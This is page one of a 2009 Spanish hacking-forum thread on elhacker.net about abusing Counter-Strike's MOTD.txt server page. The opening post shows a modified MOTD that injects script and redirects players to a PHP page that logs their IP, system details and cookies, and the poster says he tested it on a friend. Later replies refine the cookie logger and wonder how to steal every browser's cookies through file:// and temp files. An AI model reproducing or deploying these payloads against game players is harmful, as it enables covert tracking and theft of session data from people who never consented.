elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.


Tema destacado: Arreglado, de nuevo, el registro del warzone (wargame) de EHN


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  Counter strike MOTD.txt		0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 3 Ir Abajo Respuesta Imprimir
Autor Tema: Counter strike MOTD.txt  (Leído 16,744 veces)
fede_cp


Desconectado Desconectado

Mensajes: 527


"porque pensar nunca fue entender"


Ver Perfil WWW
Counter strike MOTD.txt
« en: 23 Diciembre 2009, 00:45 am »
Bueno gente,el que alguna vez tubo un server de counter strike, sabe que el archivo MOTD.txt contiene ese especie de "portada", al iniciarse en un server.

aca el code del MOTD.txt

Código
  1. <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/1999/REC-html401-19991224/loose.dtd">
  4. <title>Cstrike MOTD</title>
  5. <style type="text/css">
  6. pre 	{
  7. 		font-family:Verdana,Tahoma;
  8. 		color:#FFB000;
  9.     	}
  10. body	{
  11. 		background:#000000;
  12. 		margin-left:8px;
  13. 		margin-top:0px;
  14. 		}
  15. a	{
  16.     	text-decoration:    underline;
  17. 	}
  18. a:link  {
  19.     color:  #FFFFFF;
  20.     }
  21. a:visited   {
  22.     color:  #FFFFFF;
  23.     }
  24. a:active    {
  25.     color:  #FFFFFF;
  26.     }
  27. a:hover {
  28.     color:  #FFFFFF;
  29.     text-decoration:    underline;
  30.     }
  32. </head>
  33. <body scroll="no">
  34. <pre>
  35. You are playing Counter-Strike v1.6
  36. Visit the official CS web site @
  37. www.counter-strike.net
  38. <a href="http://www.counter-strike.net">Visit Counter-Strike.net</a>
  39. </pre>
  40. </body>
  41. </html>

Supongo que sabran que significara todo esto, o lo habran visto alguna vez.

Entonces dije, CARAJO, porque no me di cuenta antes, y buen empeze a "tocar" un poco todo y aqui esta el code con los cambios.

Código
  1. <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/1999/REC-html401-19991224/loose.dtd">
  4. <title>caca</title>
  5. <script>alert("scripting")<script>
  6. <META HTTP-EQUIV="Refresh" CONTENT="0; URL=http://localhost/web.php?cookie=">
  7. <style type="text/css">
  8. pre 	{
  9. 		font-family:Verdana,Tahoma;
  10. 		color:#FFB000;
  11.     	}
  12. body	{
  13. 		background:#000000;
  14. 		margin-left:8px;
  15. 		margin-top:0px;
  16. 		}
  17. a	{
  18.     	text-decoration:    underline;
  19. 	}
  20. a:link  {
  21.     color:  #FFFFFF;
  22.     }
  23. a:visited   {
  24.     color:  #FFFFFF;
  25.     }
  26. a:active    {
  27.     color:  #FFFFFF;
  28.     }
  29. a:hover {
  30.     color:  #FFFFFF;
  31.     text-decoration:    underline;
  32.     }
  34. </head>
  35. <body scroll="no">
  36. <pre>
  37. You are playing Counter-Strike v1.6
  38. Visit the official CS web site @
  39. www.counter-strike.net
  40. <a href="http://www.counter-strike.net">Visit Counter-Strike.com</a>
  41. </pre>
  42. </body>
  43. </html>

le puse que se redireccione, a web.php, para sacar cookies, que todavía no me salio nose porque.

aca web.php:

Código
  1. <html>
  2. <head>
  3. <title>Xss re pillo</html>
  4. </head>
  5. <body>
  6. <?php
  7. $ip = $_SERVER['REMOTE_ADDR'];
  8. $userAgent = $_SERVER['HTTP_USER_AGENT'];
  9. $cookie = $_GET['cookie'];
  10. $scuandal = "ip-víctima:" . $ip . " sistema operativo:" . PHP_OS . " -Servidor :" . $_SERVER['SERVER_NAME'] . " [+] info del server: " . $_SERVER['SERVER_SOFTWARE'] . $cookie;
  11. $fff = fopen("archivo.txt","a");
  12. fwrite($fff, "$scuandal \n");
  13. fclose($fff);
  14. ?>
  15. <script>window.location='http://localhost/web.php?cookie='+document.cookie;</script>
  16. </body>
  17. </html>

y  :o, observen archivo.txt

ip-víctima:127.0.0.1 sistema operativo:WINNT -Servidor :localhost
  • info del server: Apache/2.2.11 (Win32) PHP/5.3.0

lo probe con un amigo y me da su info

obvio que info del server va a ser mi info jajja

bien se peude sacar info por php, pero ahora la gran pregunta, si tantos navegadores poseen bugs, como mozilla,IE, aunque no sea un navegador completo, seria una especie, tendria que tener bugs si son permitidos tambien estos tipos de cosas.

nadie sabe donde se encuentra el "navegador", donde se carga el MOTD.txt

si alguien tiene ganas de buscar, que tenga un poco mas de idea podemos sacar algo de provecho a esto.

PD:Es una mezcla entre bugs y exploits a nivel web-hacking-y bugs y exploits jajaja

saludos
« Última modificación: 23 Diciembre 2009, 00:55 am por fede_cp » En línea
somos lo que hacemos para cambiar lo que somos

http://elhackerblog.blogspot.com el blog de elhacker.net!!
Castg!
Wiki

Desconectado Desconectado

Mensajes: 1.191



Ver Perfil WWW
Re: Counter strike MOTD.txt
« Respuesta #1 en: 23 Diciembre 2009, 01:12 am »
pero fede, es como un bucle infinito eso, yo diria de hacer algo asi:

este seria el archivo localhost/xss-cs/index.php :
Código
  1. <?php
  2. if (isset($_GET['cookie'])){
  3. $ip = $_SERVER['REMOTE_ADDR'];
  4. $userAgent = $_SERVER['HTTP_USER_AGENT'];
  5. $cookie = $_GET['cookie'];
  6. $scuandal = "ip-víctima:" . $ip . " sistema operativo:" . PHP_OS . " -Servidor :" . $_SERVER['SERVER_NAME'] . " [+] info del server: " . $_SERVER['SERVER_SOFTWARE'] . $cookie;
  7. $fff = fopen("archivo.txt","a");
  8. fwrite($fff, "$scuandal \n");
  9. fclose($fff);
  10. }else{
  11. header("Location ?cookie=$_SERVER['HTTP_COOKIE']");
  12. }
  13. ?>

igual no creo que te de todas las cookies de todas las paginas.
En línea


Creiste que mi firma había muerto? NO! Volvió, y en forma de fichas!

link al último código de la firma
fede_cp


Desconectado Desconectado

Mensajes: 527


"porque pensar nunca fue entender"


Ver Perfil WWW
Re: Counter strike MOTD.txt
« Respuesta #2 en: 23 Diciembre 2009, 01:23 am »
igualmente si las cookies no las tiene, te da la info igual, asique no tiene que estar (isset)



saludos tomii!
En línea
somos lo que hacemos para cambiar lo que somos

http://elhackerblog.blogspot.com el blog de elhacker.net!!
tragantras


Desconectado Desconectado

Mensajes: 465


Ver Perfil
Re: Counter strike MOTD.txt
« Respuesta #3 en: 23 Diciembre 2009, 02:02 am »
pero qué cookies espras que tenga el explorador web integrado del juego... xD
En línea
Colaboraciones:
1 2
Castg!
Wiki

Desconectado Desconectado

Mensajes: 1.191



Ver Perfil WWW
Re: Counter strike MOTD.txt
« Respuesta #4 en: 23 Diciembre 2009, 02:04 am »
jsutamente queremos saber eso, (me integro en el proyecto :P) como hacer para conseguir todas las cookies que tenga para todas las webs para todos los epxloradores, seria algo con file://// ??? y algo con temp no??
En línea


Creiste que mi firma había muerto? NO! Volvió, y en forma de fichas!

link al último código de la firma
fede_cp


Desconectado Desconectado

Mensajes: 527


"porque pensar nunca fue entender"


Ver Perfil WWW
Re: Counter strike MOTD.txt
« Respuesta #5 en: 23 Diciembre 2009, 02:05 am »
por eso mismo, pregunto, pense que habia una realcion entre ese navegador y porai el IE, o el mozilla, o alguno de los navegadores.

nadie mas tiene idea que se podria hcaer con estooo??

y claro, leer alguno de los archivos temp, como dice castg

habria que conseguir el code del browser

¿nadie sabe donde esta?
saludos
« Última modificación: 23 Diciembre 2009, 02:08 am por fede_cp » En línea
somos lo que hacemos para cambiar lo que somos

http://elhackerblog.blogspot.com el blog de elhacker.net!!
Castg!
Wiki

Desconectado Desconectado

Mensajes: 1.191



Ver Perfil WWW
Re: Counter strike MOTD.txt
« Respuesta #6 en: 23 Diciembre 2009, 02:07 am »
increiblE! lo mismo con cuanto de diferencia? menos de un minuto jajaja
Cita de: cɐstg en 23 Diciembre 2009, 02:04 am
jsutamente queremos saber eso, (me integro en el proyecto :P) como hacer para conseguir todas las cookies que tenga para todas las webs para todos los epxloradores, seria algo con file://// ??? y algo con temp no??
Cita de: fede_cp en 23 Diciembre 2009, 02:05 am
por eso mismo, pregunto, pense que habia una realcion entre ese navegador y porai el IE, o el mozilla, o alguno de los navegadores.

nadie mas tiene idea que se podria hcaer con estooo??


saludos
En línea


Creiste que mi firma había muerto? NO! Volvió, y en forma de fichas!

link al último código de la firma
Castg!
Wiki

Desconectado Desconectado

Mensajes: 1.191



Ver Perfil WWW
Re: Counter strike MOTD.txt
« Respuesta #7 en: 23 Diciembre 2009, 02:12 am »
ah nono, disculpen mi terrible ignorancia, como no me di cuenta antes, que tanto bondi con get y eso, mas simple:

Código
  1. <?php
  2. $ip = $_SERVER['REMOTE_ADDR'];
  3. $userAgent = $_SERVER['HTTP_USER_AGENT'];
  4. $cookie = $_SERVER['HTTP_COOKIE'];
  5. $scuandal = "ip-víctima:" . $ip . " sistema operativo:" . PHP_OS . " -Servidor :" . $_SERVER['SERVER_NAME'] . " [+] info del server: " . $_SERVER['SERVER_SOFTWARE'] . $cookie;
  6. $fff = fopen("archivo.txt","a");
  7. fwrite($fff, "$scuandal \n");
  8. fclose($fff);
  9. ?>

ahi no hay drama con nada, si la cookie es grande, si es chica, si es corta, si no lo puso en get si anda. listo. mucho mas facil.
En línea


Creiste que mi firma había muerto? NO! Volvió, y en forma de fichas!

link al último código de la firma
fede_cp


Desconectado Desconectado

Mensajes: 527


"porque pensar nunca fue entender"


Ver Perfil WWW
Re: Counter strike MOTD.txt
« Respuesta #8 en: 23 Diciembre 2009, 02:29 am »
Es lo que probe recien tom, pero no funca, alguien que este mas en el temaaa


saludos


PD:alguna idea buena
En línea
somos lo que hacemos para cambiar lo que somos

http://elhackerblog.blogspot.com el blog de elhacker.net!!
WHK
Moderador Global
***
Desconectado Desconectado

Mensajes: 6.609


Sin conocimiento no hay espíritu


Ver Perfil WWW
Re: Counter strike MOTD.txt
« Respuesta #9 en: 23 Diciembre 2009, 07:26 am »
De hecho estoy 99% seguro que utilizan ieframe.dll de internet explorer, de hecho también estoy casi seguro de que si interpreta tu redirección entonces también debería interpretar código javascript xD pero no estoy seguro.

No se para que necesitas saber la ip si se supone que el servidor es tuyo y en la consola aparecen las ips conectadas xD pero igual es entrete ver todo eso, hay muchos servidores por ahi con ese contenido modificado para hacerse spam y cosas así.

Esto no es una vuln, es una feature como diría sdc xDDDD
En línea
- https://yhojann.cl/ - https://whk.cl/
Páginas: [1] 2 3 Ir Arriba Respuesta Imprimir 

Ir a:  
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines